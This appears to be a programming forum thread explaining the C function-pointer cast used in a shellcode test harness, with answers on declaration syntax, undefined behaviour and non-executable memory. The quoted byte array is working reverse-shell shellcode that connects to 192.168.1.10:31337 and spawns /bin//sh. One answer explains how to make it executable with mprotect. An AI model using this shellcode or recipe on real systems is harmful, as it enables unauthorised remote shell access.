What does int (*ret)() = (int(*)())code mean?

Posted 2020-03-04 09:01

Question:

Here is a copy of code from shellstorm:

#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69) 
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"

unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";

main() 
{
 printf("Shellcode Length: %d\n", sizeof(code)-1);
 int (*ret)() = (int(*)())code;
 ret();
}

Could anyone help me understand the line "int (*ret)() = (int(*)())code;"? How does it work? Why does it make the code above run?
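For reference, the IPADDR and PORT macros hold the address and port as raw bytes in network (big-endian) byte order, as the comment in the listing indicates. Below is a minimal sketch of how those bytes could be derived, assuming a POSIX system. The helper encode_endpoint is hypothetical and not part of the original code.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Hypothetical helper: writes the 4 address bytes and 2 port bytes in
   network (big-endian) order. Returns 0 on success, -1 on a bad address. */
int encode_endpoint(const char *dotted_quad, uint16_t port,
                    unsigned char ip_out[4], unsigned char port_out[2])
{
    struct in_addr addr;
    uint16_t be_port;

    if (inet_pton(AF_INET, dotted_quad, &addr) != 1)
        return -1;

    memcpy(ip_out, &addr.s_addr, 4);   /* s_addr is already in network order */
    be_port = htons(port);             /* host order to network order */
    memcpy(port_out, &be_port, 2);
    return 0;
}
```

Calling encode_endpoint("192.168.1.10", 31337, ip, port) should fill ip with c0 a8 01 0a and port with 7a 69, matching the macros above.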

Answer 1:

int(*ret)()

declares a function pointer named ret; the function takes unspecified arguments and returns an integer.

(int(*)())code

casts the code array to a function pointer of that same type.

So this converts the address of the code array to a function pointer, which then allows you to call it and execute the code.

Note that this is technically undefined behavior, so it doesn't have to work this way. But this is how practically all implementations compile this code. Shellcode like this is not expected to be portable: the bytes in the code array depend on the CPU architecture and stack frame layout.
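To see the same declaration and cast without any machine code involved, here is a minimal sketch that points ret at an ordinary C function instead of a byte array. The function names answer and call_through_pointer are made up for illustration.

```c
/* Hypothetical stand-in for the machine code: an ordinary C function. */
static int answer(void)
{
    return 42;
}

/* Declares ret exactly as in the question, but initialises it from a real
   function, so the conversion is between function pointer types only. */
int call_through_pointer(void)
{
    int (*ret)() = (int (*)())answer;
    return ret();   /* calls answer() through the pointer */
}
```

Here the call is well defined because ret really does point at a function of a compatible type. The question's version relies on the bytes in code happening to be valid instructions in executable memory.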



Answer 2:

You should read a good C programming book.

int (*ret)() declares a pointer to a function returning an int, without specifying its arguments (in C).

Then = (int(*)())code; initializes ret with the address of code, cast to that pointer type.

Finally, ret(); calls through that function pointer, thereby invoking the machine code in your code array.

BTW, the compiler (and the linker) might put code in a non-executable data segment (this perhaps depends on how your program was linked), in which case your shell code might not work.



Answer 3:

int (*ret)()

defines ret as a pointer to a function returning an int and taking an unspecified number of arguments.

... = (int(*)())code;

casts the unsigned char array code to the pointer-to-function type of ret and assigns the result to ret.

This call

ret();

then executes the op-codes stored in code.

All in all not a nice thing.



Answer 4:

int (*ret)() = (int(*)())code;

int (*ret)() defines a pointer to a function that returns int and takes an unspecified number of arguments; (int(*)())code is a type cast that lets the rest of the statement treat code as a function pointer of the same type as ret.

By the way, depending on the contents of code, this may only work on a specific CPU and OS combination, if it works at all.



Answer 5:

int (*)() is the type of a pointer to a function with the following prototype:

int func();

Because of the way the language is parsed and the precedence of the operators, one has to put the asterisk in brackets. Also when declaring a pointer variable of that type, the name of the variable goes after the asterisk and not after the type, e.g. it is not

int (*)() ret;

but rather

int (*ret)();

In your case the ret variable is both being declared and initialised with a type cast involved.

To call a function through a function pointer, you could either use the more elaborate syntax:

(*ret)();

or the more simple one:

ret();

Using the former syntax is preferable since it gives indication to the reader of your code that ret is actually a pointer to a function and not the function itself.
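A minimal sketch of the declaration syntax and the two call forms side by side. The names twice and both_calls_agree are hypothetical and chosen only for this illustration.

```c
/* Hypothetical example function. */
static int twice(int x)
{
    return 2 * x;
}

/* Returns 1 when both call syntaxes produce the same result. */
int both_calls_agree(int x)
{
    int (*fp)(int) = twice;         /* the name goes next to the asterisk */
    int explicit_call = (*fp)(x);   /* dereference, then call */
    int short_call = fp(x);         /* call through the pointer directly */

    return explicit_call == short_call && short_call == 2 * x;
}
```

Both forms compile to the same call; the choice between them is purely a matter of readability.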

Now, in principle that code should not actually work. The code[] array is placed in the initialised data segment, which in most modern OSes is not executable, i.e. the call ret(); should rather produce a segmentation fault. E.g. GCC on Linux places the code variable in the .data section:

.globl code
    .data
    .align 32
    .type   code, @object
    .size   code, 93
code:
    .string "1\3001\3331...\200"

and then the .data section goes into a non-executable read-write segment:

$ readelf --segments code.exe

Elf file type is EXEC (Executable file)
Entry point 0x4003c0
There are 8 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040
                 0x00000000000001c0 0x00000000000001c0  R E    8
  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200
                 0x000000000000001c 0x000000000000001c  R      1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x000000000000064c 0x000000000000064c  R E    100000
  vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
  LOAD           0x0000000000000650 0x0000000000500650 0x0000000000500650
                 0x0000000000000270 0x0000000000000278  RW     100000
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  DYNAMIC        0x0000000000000678 0x0000000000500678 0x0000000000500678
                 0x0000000000000190 0x0000000000000190  RW     8
  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c
                 0x0000000000000020 0x0000000000000020  R      4
  GNU_EH_FRAME   0x0000000000000594 0x0000000000400594 0x0000000000400594
                 0x0000000000000024 0x0000000000000024  R      4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     8

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version
          .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini
          .rodata .eh_frame_hdr .eh_frame
   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   04     .dynamic
   05     .note.ABI-tag
   06     .eh_frame_hdr
   07     

The segment is missing the executable flag, i.e. it is only RW and not RWE, therefore no code could be executed from that memory. And indeed, running the program results in a fault at the very first instruction stored in code:

(gdb) run
Starting program: /tmp/code.exe 
Shellcode Length: 92

Program received signal SIGSEGV, Segmentation fault.
0x0000000000500860 in code ()
(gdb) up
#1  0x00000000004004a7 in main () at code.c:27
27     ret();
(gdb) print ret
$1 = (int (*)()) 0x500860 <code>
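The same check can be made from inside the process. The following is a rough sketch that assumes a Linux system where /proc/self/maps is readable; is_executable_address is a hypothetical helper, and on other systems it simply reports "unknown".

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: returns 1 if addr lies in an executable mapping,
   0 if it lies in a non-executable mapping, -1 if this cannot be determined. */
int is_executable_address(const void *addr)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t target = (uintptr_t)addr;
    int result = -1;

    if (maps == NULL)
        return -1;

    while (fgets(line, sizeof line, maps) != NULL) {
        unsigned long start, end;
        char perms[5];

        /* Each entry starts with "start-end perms", e.g. "00500000-00501000 rw-p" */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
            continue;
        if (target >= start && target < end) {
            result = (perms[2] == 'x');
            break;
        }
    }
    fclose(maps);
    return result;
}
```

Passing the code array to this helper in a setup like the one shown above would be expected to return 0, consistent with the RW flags reported by readelf.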

To make it work, you could use a combination of posix_memalign and mprotect to allocate a memory page and make it executable, then copy the content of code[] there:

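// For posix_memalign()
#define _XOPEN_SOURCE 600
#include <stdlib.h>
// For memcpy()
#include <string.h>
// For sysconf()
#include <unistd.h>
// For mprotect()
#include <sys/mman.h>

// The statements below replace the body of main()
size_t code_size = sizeof(code) - 1;
size_t page_size = sysconf(_SC_PAGESIZE);
void *mem;
int (*ret)();

printf("Shellcode Length: %zu\n", code_size);
// posix_memalign() expects a void **, so allocate through a void * first
if (posix_memalign(&mem, page_size, page_size) != 0)
    return 1;
// Make the freshly allocated page readable, writable and executable
if (mprotect(mem, page_size, PROT_READ|PROT_WRITE|PROT_EXEC) != 0)
    return 1;
memcpy(mem, code, code_size);
ret = (int (*)())mem;
(*ret)();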

Also note that the shell code uses int 0x80 to call into the Linux kernel. This won't work out of the box if the program is compiled as a 64-bit executable on a 64-bit Linux system, because a different mechanism (the syscall instruction) is used to make system calls there. In that case, specify -m32 to force the compiler to generate a 32-bit executable.
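As an alternative to posix_memalign plus mprotect, executable memory can also be requested directly with mmap. The sketch below is only an illustration under several assumptions: an x86 or x86-64 CPU, a system that permits read-write-execute anonymous mappings, and a harmless six-byte stub (mov eax, 42; ret) in place of the shell code. The name run_tiny_stub is hypothetical.

```c
#define _DEFAULT_SOURCE          /* exposes MAP_ANONYMOUS on glibc */
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: returns 42 if the stub ran, -1 if the CPU is not x86
   or the system refused to hand out an executable mapping. */
int run_tiny_stub(void)
{
#if defined(__x86_64__) || defined(__i386__)
    /* mov eax, 42 ; ret  (same encoding in 32-bit and 64-bit mode) */
    static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
    int (*ret)(void);
    int result;

    void *mem = mmap(NULL, sizeof stub, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    memcpy(mem, stub, sizeof stub);

    /* Object-to-function pointer conversion: not defined by ISO C,
       but accepted as an extension by common compilers. */
    ret = (int (*)(void))mem;
    result = ret();

    munmap(mem, sizeof stub);
    return result;
#else
    return -1;
#endif
}
```

Hardened systems may reject mappings that are writable and executable at the same time, which is why the sketch treats a failed mmap as a normal outcome rather than an error to abort on.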



Answer 6:

Your program will produce undefined behaviour. C99 spec, section 6.2.5, paragraph 27 says:

A pointer to void shall have the same representation and alignment requirements as a pointer to a character type. Similarly, pointers to qualified or unqualified versions of compatible types shall have the same representation and alignment requirements. All pointers to structure types shall have the same representation and alignment requirements as each other. All pointers to union types shall have the same representation and alignment requirements as each other. Pointers to other types need not have the same representation or alignment requirements.

Further, in section 6.3.2.3, paragraph 8, it also says:

A pointer to a function of one type may be converted to a pointer to a function of another type and back again; the result shall compare equal to the original pointer.

This means that you should not assign a function pointer to a non-function pointer because the size of a function pointer is not guaranteed to be the same as that of a char pointer or a void pointer. Now these things out of the way, let's come to your code.
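The conversion that paragraph 8 does guarantee can be sketched as follows: a function pointer is stored in a different function pointer type and converted back before the call. The names generic_fn, add_one and round_trip_ok are made up for this example.

```c
/* Hypothetical "generic" function pointer type used only for storage. */
typedef void (*generic_fn)(void);

static int add_one(int x)
{
    return x + 1;
}

/* Returns 1 if the pointer survives the round trip and still works. */
int round_trip_ok(void)
{
    int (*original)(int) = add_one;
    generic_fn stored = (generic_fn)original;       /* function to function: allowed */
    int (*restored)(int) = (int (*)(int))stored;    /* converted back before use */

    return restored == original && restored(41) == 42;
}
```

Note that stored is never called directly; only the pointer converted back to its original type is used for the call.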

int (*ret)() = (int(*)())code;

Let's take the left-hand side first. It defines ret to be a pointer to a function which takes a fixed but unknown number and type of arguments (which doesn't sound good). On the right-hand side, you are casting the array code, which evaluates to a pointer to its first element, to the same type as ret. This is undefined behaviour: the standard only defines conversions between function pointer types, not between a function pointer and a pointer to an object type, for the reasons explained above. Note also that the sizeof operator may not be applied to an expression of function type, although it may be applied to a function pointer.

In C++, an empty parameter list means void, but that's not the case in C, where it means that no information is available to check against the argument list provided by the caller. Hence you must explicitly write void. Assuming now that you have a function named code defined in your program, you had better write that statement as:

int code(void); 
int (*ret)(void) = (int(*)(void))code;

To simplify things about complex C declarations, typedef might help.

typedef int (*myfuncptr)(void); 

This defines myfuncptr as the type "pointer to a function taking no arguments and returning an int". Next, we can define a variable of type myfuncptr just like a variable of any other type in C. However, please note that code must have the same signature as the type of the function ret points to. If you cast a function pointer of any other type to myfuncptr and then call the function through the result, it causes undefined behaviour. When the types already match, the cast is redundant.

int code(void);
int foo(int);

myfuncptr ret = code; // cast not needed; same as: myfuncptr ret = &code;
myfuncptr bar = (myfuncptr)foo;  // the conversion is allowed, but calling bar() is undefined behaviour

A function name evaluates to a pointer when you assign it to, well, a function pointer of the same type. You don't need to use the address of operator &. Similarly, you can call the function pointed to by the pointer without dereferencing it first.

ret();     // call the function pointed to by ret
(*ret)();  // dereferencing ret first
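Putting the typedef, the optional & and the direct call together, a small sketch might look like this. It reuses the myfuncptr type from above; the functions one, two and sum_via_table are hypothetical.

```c
#include <stddef.h>

typedef int (*myfuncptr)(void);

/* Hypothetical functions matching the myfuncptr signature. */
static int one(void) { return 1; }
static int two(void) { return 2; }

/* Calls every function in a small table and adds up the results. */
int sum_via_table(void)
{
    myfuncptr table[] = { one, &two };   /* with or without &, same pointer type */
    int total = 0;
    size_t i;

    for (i = 0; i < sizeof table / sizeof table[0]; i++)
        total += table[i]();             /* no explicit dereference needed */

    return total;
}
```

With the typedef in place, an array of function pointers reads like an array of any other type, which is usually the main reason to introduce it.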

Please read this for details - Casting a function pointer to another type. Here's a good resource on how to mentally parse complex C declarations - Clockwise/Spiral Rule. Also note that the C standard lays down only two acceptable signatures for main:

int main(void);
int main(int argc, char *argv[]);